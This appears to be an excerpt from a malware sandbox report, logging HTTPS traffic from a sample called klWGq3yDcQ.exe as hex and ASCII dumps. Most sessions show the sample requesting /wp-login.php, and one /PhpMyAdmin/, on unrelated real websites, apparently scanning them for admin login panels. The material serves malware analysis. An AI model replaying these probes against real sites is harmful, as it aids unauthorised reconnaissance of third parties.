                                                                                                                                                                                                    2023-11-26 05:59:38 UTC535INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 64 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 38 20 47 4d 54 0d 0a 63 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 74 72 61 6e 73 66 65 72 2d 65 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 73 65 74 2d 63 6f 6f 6b 69 65 3a 20 6b 38 73 70 65 72 73 69 73 74 65 6e 74 3d 32 32 63 62 36 66 34 33 36 34 38 36 35 62 32 65 32 32 30 31 39 63 37 64 61 63 34 33 61 65 37 33 7c 31 31 66 31 38 37 36 33 38 36 34 33 65 31 33 64 37 62 64 31 39 36 33 39 39 31 66 61 63 35 32 62 3b 20 45 78 70 69 72 65 73 3d 54 75 65 2c 20 32 38 2d 4e 6f 76 2d 32 33 20 30 35 3a 35 39 3a 33 38 20 47
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not Founddate: Sun, 26 Nov 2023 05:59:38 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedset-cookie: k8spersistent=22cb6f4364865b2e22019c7dac43ae73|11f187638643e13d7bd1963991fac52b; Expires=Tue, 28-Nov-23 05:59:38 G
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC6506INData Raw: 31 39 36 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6e 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 42 65 61 63 68 20 52 65 63 72 75 69 74 6d 65 6e 74 20 42 2e 56 2e 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 63 72 69 70 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 4a 61 76 61 73 63 72 69 70 74 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 74 79 6c 65 2d 54 79 70 65 22 20
                                                                                                                                                                                                    Data Ascii: 1962<!DOCTYPE html><html lang="nl"><head><title>Beach Recruitment B.V.</title><meta http-equiv="Content-Type" content="text/html;charset=UTF-8"><meta http-equiv="Content-Script-Type" content="text/Javascript"><meta http-equiv="Content-Style-Type"
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC4045INData Raw: 46 43 36 0d 0a 69 65 2f 39 34 38 30 39 2f 69 64 2f 39 34 38 30 39 2f 62 62 2f 31 2f 66 6d 5f 70 61 72 65 6e 74 69 64 2f 39 34 38 30 38 22 3e 4f 70 64 72 61 63 68 74 67 65 76 65 72 73 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 61 69 6e 4c 65 76 20 6d 61 69 6e 4c 65 76 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 65 61 63 68 72 65 63 72 75 69 74 6d 65 6e 74 2e 63 6f 6d 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6d 73 5f 63 61 74 65 67 6f 72
                                                                                                                                                                                                    Data Ascii: FC6ie/94809/id/94809/bb/1/fm_parentid/94808">Opdrachtgevers</a> </li> </ul> </li> <li class="mainLev mainLev"><a href="https://www.beachrecruitment.com/index.php/cms_categor
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC16266INData Raw: 33 46 38 32 0d 0a 2f 64 69 76 3e 0a 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 21 2d 2d 4c 49 4e 4b 53 2d 2d 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 0a 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 61 67 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 77 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 09 0a 09 09 3c 64 69 76 20 69 64 3d 22 73 63 72 6f 6c 6c 64 6f 77 6e 22 3e 0a 20 20 20 20 20 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 73 63 72 6f 6c 6c 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 3c 6d 61 69 6e 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73
                                                                                                                                                                                                    Data Ascii: 3F82/div></div></div>...LINKS--></div></div><div class="pager"><div class="sw"></div></div><div id="scrolldown"> <div class="icon-scroll"></div> </div></div></header><main> <div clas
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    197192.168.2.459954104.26.12.2454436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:37 UTC177OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: hightideinc.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC776INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 76 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 65 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 05:59:38 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC593INData Raw: 31 38 65 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 48 69 67 68 20 54 69 64 65 20 49 6e 63 2e 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 2c 20 6e 6f 69 6e 64 65 78 2c 20 6e 6f 61 72 63 68 69 76 65
                                                                                                                                                                                                    Data Ascii: 18e9<!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Log In &lsaquo; High Tide Inc. &#8212; WordPress</title><meta name="robots" content="max-image-preview:large, noindex, noarchive
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC1369INData Raw: 66 3d 22 68 74 74 70 73 3a 2f 2f 68 69 67 68 74 69 64 65 69 6e 63 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 66 6f 72 6d 73 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 31 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 6c 31 30 6e 2d 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 69 67 68 74 69 64 65 69 6e 63 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 6c 31 30 6e 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 31 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69
                                                                                                                                                                                                    Data Ascii: f="https://hightideinc.com/wp-admin/css/forms.min.css?ver=6.4.1" type="text/css" media="all" /><link rel="stylesheet" id="l10n-css" href="https://hightideinc.com/wp-admin/css/l10n.min.css?ver=6.4.1" type="text/css" media="all" /><link rel="stylesheet" i
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC1369INData Raw: 6c 20 41 64 64 72 65 73 73 3c 2f 6c 61 62 65 6c 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 6e 61 6d 65 3d 22 6c 6f 67 22 20 69 64 3d 22 75 73 65 72 5f 6c 6f 67 69 6e 22 20 63 6c 61 73 73 3d 22 69 6e 70 75 74 22 20 76 61 6c 75 65 20 73 69 7a 65 3d 22 32 30 22 20 61 75 74 6f 63 61 70 69 74 61 6c 69 7a 65 3d 22 6f 66 66 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 75 73 65 72 6e 61 6d 65 22 20 72 65 71 75 69 72 65 64 3d 22 72 65 71 75 69 72 65 64 22 20 2f 3e 0a 3c 2f 70 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 75 73 65 72 2d 70 61 73 73 2d 77 72 61 70 22 3e 0a 3c 6c 61 62 65 6c 20 66 6f 72 3d 22 75 73 65 72 5f 70 61 73 73 22 3e 50 61 73 73 77 6f 72 64 3c 2f 6c 61 62 65 6c 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 70 2d 70 77 64 22
                                                                                                                                                                                                    Data Ascii: l Address</label><input type="text" name="log" id="user_login" class="input" value size="20" autocapitalize="off" autocomplete="username" required="required" /></p><div class="user-pass-wrap"><label for="user_pass">Password</label><div class="wp-pwd"
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC1369INData Raw: 75 73 28 29 3b 20 64 2e 73 65 6c 65 63 74 28 29 3b 7d 20 63 61 74 63 68 28 20 65 72 20 29 20 7b 7d 7d 2c 20 32 30 30 29 3b 7d 0a 77 70 5f 61 74 74 65 6d 70 74 5f 66 6f 63 75 73 28 29 3b 0a 69 66 20 28 20 74 79 70 65 6f 66 20 77 70 4f 6e 6c 6f 61 64 20 3d 3d 3d 20 27 66 75 6e 63 74 69 6f 6e 27 20 29 20 7b 20 77 70 4f 6e 6c 6f 61 64 28 29 20 7d 0a 2f 2a 20 5d 5d 3e 20 2a 2f 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 70 20 69 64 3d 22 62 61 63 6b 74 6f 62 6c 6f 67 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 69 67 68 74 69 64 65 69 6e 63 2e 63 6f 6d 2f 22 3e 26 6c 61 72 72 3b 20 47 6f 20 74 6f 20 48 69 67 68 20 54 69 64 65 20 49 6e 63 2e 3c 2f 61 3e 20 3c 2f 70 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 69 76 61 63 79 2d 70 6f 6c 69 63 79 2d
                                                                                                                                                                                                    Data Ascii: us(); d.select();} catch( er ) {}}, 200);}wp_attempt_focus();if ( typeof wpOnload === 'function' ) { wpOnload() }/* ... */</script><p id="backtoblog"><a href="https://hightideinc.com/">&larr; Go to High Tide Inc.</a> </p><div class="privacy-policy-
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC1369INData Raw: 2f 68 69 67 68 74 69 64 65 69 6e 63 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 64 69 73 74 2f 76 65 6e 64 6f 72 2f 77 70 2d 70 6f 6c 79 66 69 6c 6c 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 33 2e 31 35 2e 30 22 20 69 64 3d 22 77 70 2d 70 6f 6c 79 66 69 6c 6c 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 68 69 67 68 74 69 64 65 69 6e 63 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 64 69 73 74 2f 68 6f 6f 6b 73 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 63 36 61 65 63 39 61 38 64 34 65 35 61 35 64 35 34 33 61 31 22 20 69 64 3d 22 77 70 2d 68 6f 6f 6b 73 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72
                                                                                                                                                                                                    Data Ascii: /hightideinc.com/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0" id="wp-polyfill-js"></script><script type="text/javascript" src="https://hightideinc.com/wp-includes/js/dist/hooks.min.js?ver=c6aec9a8d4e5a5d543a1" id="wp-hooks-js"></script><scr
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC316INData Raw: 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 69 64 3d 22 75 73 65 72 2d 70 72 6f 66 69 6c 65 2d 6a 73 2d 65 78 74 72 61 22 3e 0a 2f 2a 20 3c 21 5b 43 44 41 54 41 5b 20 2a 2f 0a 76 61 72 20 75 73 65 72 50 72 6f 66 69 6c 65 4c 31 30 6e 20 3d 20 7b 22 75 73 65 72 5f 69 64 22 3a 22 30 22 2c 22 6e 6f 6e 63 65 22 3a 22 30 30 37 63 61 39 30 65 65 30 22 7d 3b 0a 2f 2a 20 5d 5d 3e 20 2a 2f 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 68 69 67 68 74 69 64 65 69 6e 63 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 6a 73 2f 75 73 65 72 2d 70 72 6f 66 69 6c 65 2e 6d 69 6e 2e 6a 73
                                                                                                                                                                                                    Data Ascii: /script><script type="text/javascript" id="user-profile-js-extra">/* <![CDATA[ */var userProfileL10n = {"user_id":"0","nonce":"007ca90ee0"};/* ... */</script><script type="text/javascript" src="https://hightideinc.com/wp-admin/js/user-profile.min.js
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    198192.168.2.45994272.167.58.1614436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:37 UTC173OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: webstamp.ca
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC275INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 38 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 75 70 67 72 61 64 65 2d 69 6e 73 65 63 75 72 65 2d 72 65 71 75 65 73 74 73 3b 0d 0a 55 70 67 72 61 64 65 3a 20 68 32 2c 68 32 63 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 55 70 67 72 61 64 65 2c 20 63 6c 6f 73 65 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 74 65 6e 74
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:38 GMTServer: ApacheContent-Security-Policy: upgrade-insecure-requests;Upgrade: h2,h2cConnection: Upgrade, closeAccept-Ranges: bytesVary: Accept-EncodingTransfer-Encoding: chunkedContent
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC649INData Raw: 32 37 64 0d 0a 2f 77 70 2d 6c 6f 67 69 6e 2e 70 68 70 4f 4f 50 53 21 20 53 6f 6d 65 74 68 69 6e 67 20 77 65 6e 74 20 77 72 6f 6e 67 2e 20 54 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 68 61 73 20 62 65 65 6e 20 0d 0a 72 65 6d 6f 76 65 64 20 6f 72 20 69 73 20 63 75 72 72 65 6e 74 6c 79 20 75 6e 64 65 72 20 6d 61 69 6e 74 65 6e 61 6e 63 65 2e 0d 0a 46 65 65 6c 20 66 72 65 65 20 74 6f 20 72 65 61 64 20 74 68 65 20 6d 61 6e 79 20 6f 74 68 65 72 20 61 72 74 69 63 6c 65 73 20 61 76 61 69 6c 61 62 6c 65 20 61 74 20 0d 0a 68 74 74 70 73 3a 2f 2f 77 65 62 73 74 61 6d 70 2e 63 61 0d 0a 3c 21 2d 2d 20 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                    Data Ascii: 27d/wp-login.phpOOPS! Something went wrong. The page you requested has been removed or is currently under maintenance.Feel free to read the many other articles available at https://webstamp.ca...


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    199192.168.2.460008162.210.96.1174436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:37 UTC184OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: coralparkchristian.org
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC580INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 38 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 53 41 4d 45 4f 52 49 47 49 4e 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 50 48 50 53 45 53 53 49 44 3d 37 6d 66 76 68 6d 62 34 6d 66 65 61 39 36 38 32 66 63 63 70 65 75 68
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 05:59:38 GMTServer: ApachePragma: no-cacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-Frame-Options: SAMEORIGINSet-Cookie: PHPSESSID=7mfvhmb4mfea9682fccpeuh
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC3247INData Raw: 63 61 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 0a 09 09 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 63 6c 61 73 73 3d 22 69 65 38 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 38 29 20 5d 3e 3c 21 2d 2d 3e 0a 09 09 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74
                                                                                                                                                                                                    Data Ascii: ca8<!DOCTYPE html>...[if IE 8]><html xmlns="http://www.w3.org/1999/xhtml" class="ie8" lang="en-US"><![endif]-->...[if !(IE 8) ]>...><html xmlns="http://www.w3.org/1999/xhtml" lang="en-US">...<![endif]--><head><meta http-equiv="Cont
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    200192.168.2.460016141.193.213.114436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:37 UTC182OUTGET /concord/PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                    Host: kidsrkids.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC836INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:38 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingVary: Accept-EncodingVary: Accept-EncodingExpires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC533INData Raw: 37 63 36 62 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 0a 09 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 6e 63 6f 72 64 20 4c 65 61 72 6e 69 6e 67 20 41 63 61 64 65 6d 79 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6b 69 64 73 72 6b 69 64 73 2e 63 6f 6d 2f 63 6f 6e 63 6f 72 64 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0a 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 48 61 6e 64 68 65 6c 64 46 72 69 65 6e 64 6c 79 22 20 63 6f 6e 74 65 6e 74 3d 22 54 72 75 65 22 3e 0a
                                                                                                                                                                                                    Data Ascii: 7c6b<!DOCTYPE html><html lang="en-US"><head><meta charset="utf-8"><meta name="author" content="Concord Learning Academy"><link rel="pingback" href="https://kidsrkids.com/concord/xmlrpc.php"><meta name="HandheldFriendly" content="True">
